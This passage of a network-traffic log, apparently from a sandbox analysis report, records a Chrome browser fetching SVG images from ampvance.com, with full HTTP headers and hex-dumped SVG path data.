                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:44 UTC747INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:44 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 11:00:52 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: HIT
                                                      Age: 8572
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9hM9%2FZsGHS%2FzKz26NJxPB24uj9NnfC6bFLO2UHFozgNenNLwmu%2FcRAM2jlmtQ7IfF9Rsn6CuawzpkIcVCFLTobhkyAgaOQ2I%2FG3fbIW4TTMmzyXqeXxzEjUBNQ05Emw%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c1d5a76428b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:44 UTC622INData Raw: 36 33 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39
                                                      Data Ascii: 638<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689
                                                      2024-03-05 13:23:44 UTC977INData Raw: 33 2c 30 2c 30 2c 31 2c 32 38 2e 35 2c 31 33 2e 34 35 33 61 31 30 2e 34 2c 31 30 2e 34 2c 30 2c 30 2c 31 2c 31 2e 31 30 39 2c 32 2e 36 32 35 41 31 31 2e 36 31 36 2c 31 31 2e 36 31 36 2c 30 2c 30 2c 31 2c 33 30 2c 31 39 61 31 30 2e 30 31 35 2c 31 30 2e 30 31 35 2c 30 2c 30 2c 31 2d 2e 31 32 35 2c 31 2e 35 37 38 2c 31 30 2e 38 37 39 2c 31 30 2e 38 37 39 2c 30 2c 30 2c 31 2d 2e 33 35 39 2c 31 2e 35 33 31 5a 6d 2d 32 2c 2e 38 34 34 4c 32 37 2e 32 31 39 2c 32 32 2e 36 34 31 61 31 34 2e 37 31 36 2c 31 34 2e 37 31 36 2c 30 2c 30 2c 30 2c 2e 35 36 32 2d 31 2e 37 38 32 41 37 2e 37 35 31 2c 37 2e 37 35 31 2c 30 2c 30 2c 30 2c 32 38 2c 31 39 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 2e 37 2d 33 2e 35 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2d 31 2e
                                                      Data Ascii: 3,0,0,1,28.5,13.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.
                                                      2024-03-05 13:23:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      41192.168.2.449784104.21.81.2294434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:44 UTC1197OUTGET /x/048a11303f2c0b13c71de5123e30fffb65e71ce053be3 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93eLOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71cde5e93f
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:44 UTC742INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:44 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:23:44 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kLqlQiR3xeaEHtuxhyzYYzzDpSBLvD09hejIWGgkpqvK4u1W1Py90UJPpz%2BnByL6NFiRrNnhktrY%2FvV51FaSBaSnnL%2BiCw5neAZ%2FYOATDADTkFoN4t2UH%2Fz5hLvyX74%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c1d68e34270-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:44 UTC627INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                      Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                      2024-03-05 13:23:44 UTC1244INData Raw: 2d 34 35 35 2e 35 39 35 20 31 32 34 39 2e 38 2d 31 30 31 37 2e 36 53 39 35 36 2e 30 34 36 2d 38 31 39 2e 36 20 32 36 35 2e 38 2d 38 31 39 2e 36 2d 39 38 34 2d 33 36 34 2e 30 30 35 2d 39 38 34 20 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63
                                                      Data Ascii: -455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) sc
                                                      2024-03-05 13:23:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      42192.168.2.449790172.67.165.1054434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:45 UTC573OUTGET /ASSETS/img/sig-op.svg HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:45 UTC733INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:45 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:23:45 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: MISS
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DACEThzYJbDcNOvJaxvHO08BdFqvIdLKIk4IhpGoOtM4UXjC5SrcDS6JPZ3UFeCBnV%2BF6qqNF4wQpLC63eAskiNxMajA1fhU%2FM1bHF4Yl0ZUwFZJR9XbKV5INQnqJHc%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c1fff289e16-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:45 UTC636INData Raw: 36 33 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39
                                                      Data Ascii: 638<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689
                                                      2024-03-05 13:23:45 UTC963INData Raw: 33 2e 34 35 33 61 31 30 2e 34 2c 31 30 2e 34 2c 30 2c 30 2c 31 2c 31 2e 31 30 39 2c 32 2e 36 32 35 41 31 31 2e 36 31 36 2c 31 31 2e 36 31 36 2c 30 2c 30 2c 31 2c 33 30 2c 31 39 61 31 30 2e 30 31 35 2c 31 30 2e 30 31 35 2c 30 2c 30 2c 31 2d 2e 31 32 35 2c 31 2e 35 37 38 2c 31 30 2e 38 37 39 2c 31 30 2e 38 37 39 2c 30 2c 30 2c 31 2d 2e 33 35 39 2c 31 2e 35 33 31 5a 6d 2d 32 2c 2e 38 34 34 4c 32 37 2e 32 31 39 2c 32 32 2e 36 34 31 61 31 34 2e 37 31 36 2c 31 34 2e 37 31 36 2c 30 2c 30 2c 30 2c 2e 35 36 32 2d 31 2e 37 38 32 41 37 2e 37 35 31 2c 37 2e 37 35 31 2c 30 2c 30 2c 30 2c 32 38 2c 31 39 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 2e 37 2d 33 2e 35 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2d 31 2e 39 33 38 2d 32 2e 38 35 39 41 39 2e 32 36
                                                      Data Ascii: 3.453a10.4,10.4,0,0,1,1.109,2.625A11.616,11.616,0,0,1,30,19a10.015,10.015,0,0,1-.125,1.578,10.879,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.26
                                                      2024-03-05 13:23:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      43192.168.2.449791172.67.165.1054434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:45 UTC599OUTGET /x/048a11303f2c0b13c71de5123e30fffb65e71ce053be3 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:45 UTC734INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:45 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:23:45 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=xZAKziMvFAV7EOBUJdfOSrAWC4ewjrcIcU3Vcw8vp5mQjjjpdo6qhUklOkugzyKe%2FlWbrbTZwj21dy8zOd5i99OhOiibINBMSaaQgkEnzwvPnpxxq1TYuReXLEqRV3Y%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c209ce58c36-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:45 UTC635INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                      Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                      2024-03-05 13:23:45 UTC1236INData Raw: 20 31 32 34 39 2e 38 2d 31 30 31 37 2e 36 53 39 35 36 2e 30 34 36 2d 38 31 39 2e 36 20 32 36 35 2e 38 2d 38 31 39 2e 36 2d 39 38 34 2d 33 36 34 2e 30 30 35 2d 39 38 34 20 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31
                                                      Data Ascii: 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401
                                                      2024-03-05 13:23:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      44192.168.2.449792172.67.165.1054434632C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:23:45 UTC599OUTGET /o/048a11303f2c0b13c71de5123e30fffb65e71ce053c02 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=zNVt0U8x.8JKRgLQLJnJkGAErXxNyurSQF3gQoUIwEc-1709644996-1.0.1.1-gHAxKV.yo7SftjLGjlI1Q8Q.ZH1wpfZpyri2AnVshTgmScC9Gx7nqU9IhT36ZZSGZo6ZyZOiuFN.V7jFZl3IEg; PHPSESSID=6aa1ef9bee6ad93645932d7f3602420d
                                                      2024-03-05 13:23:45 UTC740INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:23:45 GMT
                                                      Content-Type: image/svg+xml
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      cache-control: public, max-age=604800
                                                      expires: Tue, 12 Mar 2024 13:23:45 GMT
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OB1Pj0kyt2%2B79ySN1lf9TTM4oPb6Xs5ATYGE18MLygSHVOHXdTOnxCyeEAqISh7BlHy0MmRqjBUAF%2B9Gy6YWi1RqfD5rfWlslCMI9ozzK%2B%2BFETx6zE3NFDJ9H69b6Xc%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6c21093943b3-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:23:45 UTC629INData Raw: 65 34 33 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 30 38 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 38 20 32 34 22 3e 3c 74 69 74 6c 65 3e 61 73 73 65 74 73 3c 2f 74 69 74 6c 65 3e 3c 70 61 74 68 20 64 3d 22 4d 34 34 2e 38 33 36 2c 34 2e 36 56 31 38 2e 34 68 2d 32 2e 34 56 37 2e 35 38 33 48 34 32 2e 34 4c 33 38 2e 31 31 39 2c 31 38 2e 34 48 33 36 2e 35 33 31 4c 33 32 2e 31 34 32 2c 37 2e 35 38 33 68 2d 2e 30 32 39 56 31 38 2e 34 48 32 39 2e 39 56 34 2e 36 68 33 2e 34 33 36 4c 33 37 2e 33 2c 31 34 2e 38 33 68 2e 30 35 38 4c 34 31 2e 35 34 35 2c 34 2e 36 5a 6d 32 2c 31 2e 30 34 39 61 31 2e 32 36 38 2c 31 2e
                                                      Data Ascii: e43<svg xmlns="http://www.w3.org/2000/svg" width="108" height="24" viewBox="0 0 108 24"><title>assets</title><path d="M44.836,4.6V18.4h-2.4V7.583H42.4L38.119,18.4H36.531L32.142,7.583h-.029V18.4H29.9V4.6h3.436L37.3,14.83h.058L41.545,4.6Zm2,1.049a1.268,1.
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 34 2e 39 31 38 2d 34 2e 39 30 38 2c 35 2e 36 34 31 2c 35 2e 36 34 31 2c 30 2c 30 2c 31 2c 31 2e 34 2d 33 2e 39 33 32 2c 35 2e 30 35 35 2c 35 2e 30 35 35 2c 30 2c 30 2c 31 2c 33 2e 39 35 35 2d 31 2e 35 34 35 2c 35 2e 34 31 34 2c 35 2e 34 31 34 2c 30 2c 30 2c 31 2c 31 2e 33 32 34 2e 31 36 38 2c 34 2e 34 33 31 2c 34 2e 34 33 31 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2e 33 39 76 32 2e 32 33 33 61 34 2e 37 36 33 2c 34 2e 37 36 33 2c 30 2c 30 2c 30 2d 31 2e 31 2d 2e 36 31 31 2c 33 2e 31 38 34 2c 33 2e 31 38 34 2c 30 2c 30 2c 30 2d 31 2e 31 35 2d 2e 32 31 37 2c 32 2e 39 31 39 2c 32 2e 39 31 39 2c 30 2c 30 2c 30 2d 32 2e 32 32 33 2e 39 2c 33 2e 33 37 2c 33 2e 33 37 2c 30 2c 30 2c 30 2d 2e 38 34 37 2c 32 2e 34 31 36 2c 33 2e 32 31 36 2c 33 2e 32 31 36 2c 30 2c 30 2c
                                                      Data Ascii: 4.918-4.908,5.641,5.641,0,0,1,1.4-3.932,5.055,5.055,0,0,1,3.955-1.545,5.414,5.414,0,0,1,1.324.168,4.431,4.431,0,0,1,1.063.39v2.233a4.763,4.763,0,0,0-1.1-.611,3.184,3.184,0,0,0-1.15-.217,2.919,2.919,0,0,0-2.223.9,3.37,3.37,0,0,0-.847,2.416,3.216,3.216,0,0,
                                                      2024-03-05 13:23:45 UTC1369INData Raw: 2c 31 2e 30 32 39 2c 30 2c 30 2c 30 2d 2e 33 39 2d 2e 38 31 33 2c 35 2e 37 36 38 2c 35 2e 37 36 38 2c 30 2c 30 2c 30 2d 31 2e 34 37 37 2d 2e 37 36 35 2c 34 2e 35 36 34 2c 34 2e 35 36 34 2c 30 2c 30 2c 31 2d 31 2e 38 32 39 2d 31 2e 32 31 33 2c 32 2e 36 35 35 2c 32 2e 36 35 35 2c 30 2c 30 2c 31 2d 2e 35 33 39 2d 31 2e 37 31 33 2c 32 2e 37 30 36 2c 32 2e 37 30 36 2c 30 2c 30 2c 31 2c 31 2e 30 36 33 2d 32 2e 32 41 34 2e 32 34 33 2c 34 2e 32 34 33 2c 30 2c 30 2c 31 2c 38 31 2e 35 2c 38 2e 32 35 36 61 36 2e 36 36 33 2c 36 2e 36 36 33 2c 30 2c 30 2c 31 2c 31 2e 31 36 34 2e 31 31 35 2c 35 2e 31 36 31 2c 35 2e 31 36 31 2c 30 2c 30 2c 31 2c 31 2e 30 37 38 2e 33 76 32 2e 32 31 34 61 34 2e 39 37 34 2c 34 2e 39 37 34 2c 30 2c 30 2c 30 2d 31 2e 30 37 38 2d 2e 35 32 39
                                                      Data Ascii: ,1.029,0,0,0-.39-.813,5.768,5.768,0,0,0-1.477-.765,4.564,4.564,0,0,1-1.829-1.213,2.655,2.655,0,0,1-.539-1.713,2.706,2.706,0,0,1,1.063-2.2A4.243,4.243,0,0,1,81.5,8.256a6.663,6.663,0,0,1,1.164.115,5.161,5.161,0,0,1,1.078.3v2.214a4.974,4.974,0,0,0-1.078-.529
